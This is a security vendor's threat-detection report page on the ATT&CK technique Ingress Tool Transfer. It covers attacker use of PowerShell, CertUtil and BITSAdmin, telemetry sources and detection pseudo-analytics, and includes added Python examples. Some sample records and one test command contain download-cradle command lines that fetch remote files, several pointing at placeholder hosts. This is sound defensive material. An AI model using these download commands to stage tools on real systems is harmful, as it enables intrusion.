Effective URL: https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
2022 Threat Detection Report
TECHNIQUE T1105


INGRESS TOOL TRANSFER

The process for an adversary bringing their own tools into an environment is
known as ingress tool transfer, and it’s a perennial mainstay in our annual
ATT&CK technique rankings.



#5

TECHNIQUE RANK


20.4%

PERCENT OF CUSTOMERS AFFECTED


1,256

TOTAL THREAT VOLUME


THREAT SOUNDS

Like Dylan going electric, some adversaries pivot from “living-off-the-land”
techniques and drop their own tools on a victim system.




ANALYSIS


WHY DO ADVERSARIES USE INGRESS TOOL TRANSFER?

Note: Ingress Tool Transfer has no sub-techniques.

Administrative tooling and other native operating system binaries offer
adversaries a rich array of functionalities that are ripe for abuse. While an
adversary can accomplish many of their objectives by living off the land, they
often require non-native tooling to perform post-exploitation activity and
accomplish their goals. The process for bringing their own tools into an
environment is known as ingress tool transfer.


HOW DO ADVERSARIES USE INGRESS TOOL TRANSFER?

One way to organize the many variations on ingress tool transfer is to split the
activity into two distinct but broad categories:

 * transferral via native Windows binaries
 * transferral via third-party tooling

Many native system binaries enable adversaries to make external network
connections and download executables, scripts, and other binaries. In fact, we
observe adversaries leveraging native system binaries to perform ingress tool
transfer far more often than not. This is a major part of the reason that we
commonly observe the Ingress Tool Transfer technique in tandem with other ATT&CK
techniques. As such, we’ll spend the bulk of this section explaining how
adversaries abuse legitimate executables for ingress tool transfer.

However, we’ll start with a brief examination of non-native software that
adversaries use to transfer tools—hopefully setting the stage for why native
tooling is an appealing choice. Almost all command and control (C2) frameworks
provide support for uploading and downloading files. Despite this, adversaries
frequently choose to abuse native binaries to retrieve additional tools and
payloads. There are many nuanced reasons why an adversary might choose a system
binary over a C2 functionality, but it mostly boils down to blending in. For
example, while it might be highly suspicious for a C2-related process to reach
out to an external network address and pull down a binary, it could be
completely normal for a legitimate system process to do the same.

Beyond C2 tools, it’s not unusual to see adversaries using remote monitoring and
management (RMM) tools to perform ingress tool transfer. RMM software can be
problematic for an adversary though, as defenders can simply block the use of
tools that aren’t permitted in their environment, which is precisely why
adversaries often resort to renaming such tools.

PowerShell is, by a wide margin, the system binary that we detect adversaries
leveraging most frequently for ingress tool transfer. Some other common culprits
include BITSAdmin, CertUtil, cURL, Wget, WScript, and CScript.

Another native system binary commonly abused by adversaries is BITSAdmin.
BITSAdmin is a utility that manages BITS jobs (Windows Background Intelligent
Transfer Service), primarily for the purpose of downloading Windows Updates, but
adversaries use it to download arbitrary files.

The LOLBAS project is a great resource and searchable database that’s mapped to
ATT&CK and documents native binaries, scripts, and libraries that adversaries
abuse. You can examine a full list of binaries that are used for ingress tool
transfer here.




VISIBILITY


Note: The visibility sections in this report are mapped to MITRE ATT&CK data
sources and components.

Nearly any attack involves some level of ingress tool transfer, so it’s
critically important that you have the telemetry necessary to observe and detect
it. Luckily, there’s no shortage of data sources offering visibility into this
technique, and many of the data sources below can be drawn out of EDR and other
widely available security tools.

PROCESS MONITORING

Since ingress tool transfer typically involves the use of system processes,
process monitoring is among the most important data sources for detecting it.
However, unless you’re looking for known malicious or banned processes, you’ll
want to build your detection analytics such that process names are supplemented
by command-line arguments, file modifications, DLL module loads, and network
connections.

COMMAND-LINE MONITORING

As is almost always the case, command-line arguments are among the best
telemetry for observing and detecting adversaries loading malicious tools into
your environment, particularly when used in concert with process monitoring and
other data sources. Beyond detection, command lines may also serve as a pivotal
point for investigation, especially in cases where something like a PowerShell
or cURL command line includes URLs used to host remote content for download and
execution.

NETWORK CONNECTIONS

Network connection telemetry is a great source of enrichment data for detecting
ingress tool transfer. While network connections offer fleeting value on their
own, they’re extremely valuable in combination with process and command-line
monitoring. Almost by definition, if you’re dealing with an adversary who is
performing ingress tool transfer, an external network connection is happening
somewhere.




COLLECTION


Note: The collection sections of this report showcase specific log sources from
Windows events, Sysmon, and elsewhere that you can use to collect relevant
security information.

SYSMON EVENT ID 1: PROCESS CREATION

The process creation event offers a wealth of information that security teams
can use for detection, specifically via the following fields:

 * ProcessId
 * ProcessGuid
 * Image
 * Commandline
 * CurrentDirectory
 * ParentProcessGuid
 * ParentProcessId
 * ParentCommandLine

As is the case with a commercial EDR product, we can leverage the above to
identify what process executed, the process that spawned it, and the commands or
arguments that executed in conjunction with it.

SYSMON EVENT ID 3: NETWORK CONNECTION

Though they are disabled by default, network connection events offer a variety
of log data that you can use to investigate or detect suspicious ingress tool
transfers. While network connections aren’t particularly useful on their own,
they’re useful in conjunction with other data, and Event ID 3 collects all of
the following:

 * ProcessGuid
 * ProcessId
 * Image
 * Protocol
 * SourceIP
 * DestinationIP
 * DestinationHostname
 * DestinationPort

SYSMON EVENT ID 11: FILE CREATE

By definition, ingress tool transfers require the creation of files on an
endpoint, and file creation events are populated whenever a file is created or
overwritten. Since processes constantly create temp files during normal
activity, Event ID 11 can be incredibly noisy without thoughtful tuning.
However, you can use Event ID 11 to track the file creation history of processes
that adversaries frequently abuse (like those listed in the analysis section
above). Consider limiting collection to oft-abused processes, directories where
adversaries tend to drop malware (AppData\Temp or C:\Users\Public, for example),
or specific file extension types like image files, executables, DLLs, and
scripts. Event fields of interest are:

 * ProcessId
 * ProcessGuid
 * Image
 * TargetFileName

SYSMON EVENT ID 22: DNS EVENT

This is a newer event in Sysmon, but it can provide useful visibility into
systems that may be communicating with C2 servers. According to Microsoft, this
event will create a log whenever a process executes a DNS query, regardless of
whether it succeeds or fails, cached or not. Logs from Event ID 22 offer
additional network telemetry that can be incredibly useful in conjunction with
the Event ID 3 logs listed above:

 * ProcessGuid
 * ProcessId
 * QueryName
 * QueryStatus
 * QueryResult
 * Image

WINDOWS SECURITY EVENT ID 4688: PROCESS CREATION

Process Creation (4688) events with command-line argument logging enabled are a
great native source of telemetry for observing ingress tool transfer. A good
understanding of baseline process relationships in your environment will help
combat potential false positive alerts.
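Correlating the four Sysmon event types above by ProcessGuid, as an added example that is not part of the Red Canary report: the events are constructed, the watched directories and extensions are assumptions drawn from the Event ID 11 guidance, and a process that both made a network connection and wrote a watched file is flagged as an ingress tool transfer candidate.

```python
from collections import defaultdict

# Constructed Sysmon events (not real logs), carrying the fields the
# Collection section lists for Event IDs 1, 3, 11 and 22. Real Sysmon
# writes XML to the event log; here each event is already a flat dict and
# the list is in time order.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A1}", "ProcessId": 4120, "Image": PS,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell (New-Object Net.WebClient).DownloadFile('http://example.invalid/t.exe','C:\\Users\\Public\\t.exe')"},
    {"EventID": 22, "ProcessGuid": "{A1}", "Image": PS,
     "QueryName": "example.invalid", "QueryStatus": "0", "QueryResult": "203.0.113.10"},
    {"EventID": 3, "ProcessGuid": "{A1}", "Image": PS, "Protocol": "tcp",
     "DestinationIp": "203.0.113.10", "DestinationHostname": "example.invalid", "DestinationPort": 80},
    {"EventID": 11, "ProcessGuid": "{A1}", "Image": PS, "TargetFilename": r"C:\Users\Public\t.exe"},
    {"EventID": 1, "ProcessGuid": "{B2}", "ProcessId": 880, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"EventID": 11, "ProcessGuid": "{B2}", "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\thumb.tmp"},
]

# Event ID 11 tuning from the text (assumed lists): keep only file creates in
# directories adversaries favour or with executable-style extensions.
WATCH_DIRS = ("\\appdata\\local\\temp\\", "c:\\users\\public\\")
WATCH_EXTS = (".exe", ".dll", ".ps1", ".vbs", ".js", ".bat", ".hta")

def interesting_file(path):
    p = path.lower()
    return any(d in p for d in WATCH_DIRS) or p.endswith(WATCH_EXTS)

def correlate(events):
    """Group events by ProcessGuid into one timeline per process."""
    procs = defaultdict(lambda: {"image": None, "command_line": None,
                                 "dns": [], "connections": [], "files": []})
    for ev in events:
        p = procs[ev["ProcessGuid"]]
        if ev["EventID"] == 1:
            p["image"], p["command_line"] = ev["Image"], ev["CommandLine"]
        elif ev["EventID"] == 22:
            p["dns"].append(ev["QueryName"])
        elif ev["EventID"] == 3:
            p["connections"].append((ev["DestinationHostname"] or ev["DestinationIp"], ev["DestinationPort"]))
        elif ev["EventID"] == 11 and interesting_file(ev["TargetFilename"]):
            p["files"].append(ev["TargetFilename"])
    return procs

def ingress_candidates(events):
    """ProcessGuids that both reached the network and dropped a watched file."""
    return [g for g, p in correlate(events).items() if p["connections"] and p["files"]]
```

explorer.exe writing a temp file is kept by the Event ID 11 filter but never becomes a candidate because it made no network connection; the command line of the flagged process is the investigation pivot the text describes.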




DETECTION

We have 65 distinct detection analytics mapped to Ingress Tool Transfer,
offering defense in depth against this technique. Some of these analytics look
for high-impact, low-prevalence threats and rarely generate events, but there
are a few relatively simple ones that can offer great value with little effort.

Note: These detection analytics may require tuning.

SUSPICIOUS POWERSHELL COMMANDS

As we explained in the analysis section, adversaries leverage PowerShell for
ingress tool transfer more than any other tool. As such, monitoring for
PowerShell process execution in conjunction with suspicious PowerShell commands
in the command line can be a fruitful way to detect malicious ingress tool
transfers. The following pseudo-analytic is derived from several Red Canary
detectors that collectively triggered on 1,000 confirmed malicious,
high-severity threats in 2021 alone:

process == powershell.exe
&&
command_line_includes ('downloadstring' || 'downloaddata' || 'downloadfile')

If you want to test your ability to operationalize the above detection analytic,
try running either of the following Atomic Red Team tests:

 * T1105 atomic test #10: PowerShell Download
 * T1105 atomic test #15: File Download via PowerShell

CERTUTIL DOWNLOADING MALICIOUS BINARIES

Adversaries often bypass security controls by using the Windows Certificate
Utility (certutil.exe) to download malicious code. In general, they leverage
certutil.exe along with the -split command-line option. We’ve observed this
behavior firsthand in detections associated with TA551, while other researchers
have tied it to trojans like Astaroth as well. The following detection logic
should catch this variety of ingress tool transfer:

process == certutil.exe 
&& 
command_line_includes ('urlcache' && 'split')

If you want to test your ability to operationalize the above detection analytic,
try running either of the following Atomic Red Team tests:

 * T1105 atomic test #7: CertUtil download (urlcache)
 * T1105 atomic test #8: CertUtil download (verifyctl)

BITSADMIN DOWNLOADING MALICIOUS BINARIES

As we explained in the analysis section, it’s not unusual for adversaries,
including ones who peddle ransomware, to use BITSAdmin to download arbitrary
files from the internet in an effort to evade application blocklisting. The
following analytic will look for the execution of bitsadmin.exe with command
options that suggest a file is being downloaded:

process == bitsadmin.exe
&&
command_line_includes ('download' || 'transfer')

If you want to test your ability to operationalize the above detection analytic,
try running the following Atomic Red Team test:

 * T1105 atomic test #9: BITSAdmin BITS Download


WEEDING OUT FALSE POSITIVES

The majority of the telemetry patterns above can also manifest in development
pipelines and system management tools. Given this, baselining is highly
recommended due to the volume some sources will provide. Additionally, you may
want to do an environment audit and figure out if these potentially suspicious
behaviors are being employed by any legitimate tools or people in your
environment. Once you understand legitimate use cases, you can tune those out as
exceptions and focus your detection efforts on seeking out behaviors that are
more likely to represent malicious instances of ingress tool transfer.
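The three pseudo-analytics above, together with the baseline exceptions this section recommends, expressed as runnable Python over constructed process-creation records (an added example, not Red Canary's detector code); the CI-agent exception and the example.invalid hosts are hypothetical.

```python
# Constructed process-creation records (Sysmon Event ID 1 / Security 4688
# style), not real telemetry. Image, ParentImage and CommandLine are used.
SAMPLE_PROCESSES = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/a.ps1')"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/a.exe a.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "bitsadmin /transfer job /download /priority high "
                    "http://example.invalid/b.exe C:\\Users\\Public\\b.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",          # benign use, must not fire
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -verify cert.cer"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\BuildAgent\agent.exe",             # hypothetical CI agent
     "CommandLine": "powershell (New-Object Net.WebClient).DownloadFile("
                    "'https://artifacts.example.invalid/tool.zip','tool.zip')"},
]

def _name(image):
    return image.rsplit("\\", 1)[-1].lower()

def _has_all(cmd, *needles):
    return all(n in cmd.lower() for n in needles)

def _has_any(cmd, *needles):
    return any(n in cmd.lower() for n in needles)

# The three pseudo-analytics from the Detection section as predicates
# (matching is case-insensitive, since command-line casing is arbitrary).
ANALYTICS = {
    "suspicious_powershell_download": lambda r: _name(r["Image"]) == "powershell.exe"
        and _has_any(r["CommandLine"], "downloadstring", "downloaddata", "downloadfile"),
    "certutil_urlcache_split": lambda r: _name(r["Image"]) == "certutil.exe"
        and _has_all(r["CommandLine"], "urlcache", "split"),
    "bitsadmin_download": lambda r: _name(r["Image"]) == "bitsadmin.exe"
        and _has_any(r["CommandLine"], "download", "transfer"),
}

# Exceptions learned from an environment baseline (hypothetical): a CI agent
# that legitimately pulls artifacts with PowerShell from one internal host.
# Parent process AND destination are both required, so a renamed tool or a
# different URL under the same parent still fires.
BASELINE_EXCEPTIONS = [
    {"analytic": "suspicious_powershell_download",
     "parent": r"c:\buildagent\agent.exe",
     "url_prefix": "https://artifacts.example.invalid/"},
]

def _excepted(name, rec):
    return any(e["analytic"] == name
               and rec["ParentImage"].lower() == e["parent"]
               and e["url_prefix"] in rec["CommandLine"].lower()
               for e in BASELINE_EXCEPTIONS)

def run_analytics(records):
    """Return (analytic_name, record) pairs that fire and are not baselined out."""
    return [(name, rec) for rec in records
            for name, pred in ANALYTICS.items()
            if pred(rec) and not _excepted(name, rec)]
```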




TESTING

Start testing your defenses against Ingress Tool Transfer using Atomic Red
Team—an open source testing framework of small, highly portable detection tests
mapped to MITRE ATT&CK.

GETTING STARTED

View atomic tests for T1105: Ingress Tool Transfer. In most environments, these
should be sufficient to generate a useful signal for defenders.

RUN THIS TEST ON A WINDOWS SYSTEM USING POWERSHELL:

(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt') | Out-File LICENSE.txt; Invoke-Item LICENSE.txt

What to expect

The above test will download a file to LICENSE.txt and display it with
notepad.exe. For safety purposes, the command only downloads and displays text
rather than downloading and executing executable content.

USEFUL TELEMETRY WILL INCLUDE:

Visibility: Process monitoring
Telemetry: A powershell.exe and notepad.exe process will start.
Collection: EDR, Sysmon Event ID 1, and Windows Event ID 4688 should collect relevant telemetry.

Visibility: Command monitoring
Telemetry: Command-line logging will capture the context of what is executed.
Collection: EDR, Sysmon Event ID 1, and Windows Event ID 4688 should collect relevant telemetry.

Visibility: Network monitoring
Telemetry: A connection to https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt is made.
Collection: EDR and Sysmon Event IDs 3 and 22 should collect relevant telemetry.

Visibility: File monitoring
Telemetry: powershell.exe will write LICENSE.txt to the current directory.
Collection: EDR and Sysmon Event ID 11 should collect relevant telemetry.

REVIEW AND REPEAT

Now that you have executed one or several common tests and checked for the
expected results, it’s useful to answer some immediate questions:

 * Were any of your actions detected?
 * Were any of your actions blocked or prevented?
 * Were your actions visible in logs or other defensive telemetry?

Repeat this process, performing additional tests related to this technique. You
can also create and contribute tests of your own.

© 2014-2022 Red Canary. All rights reserved.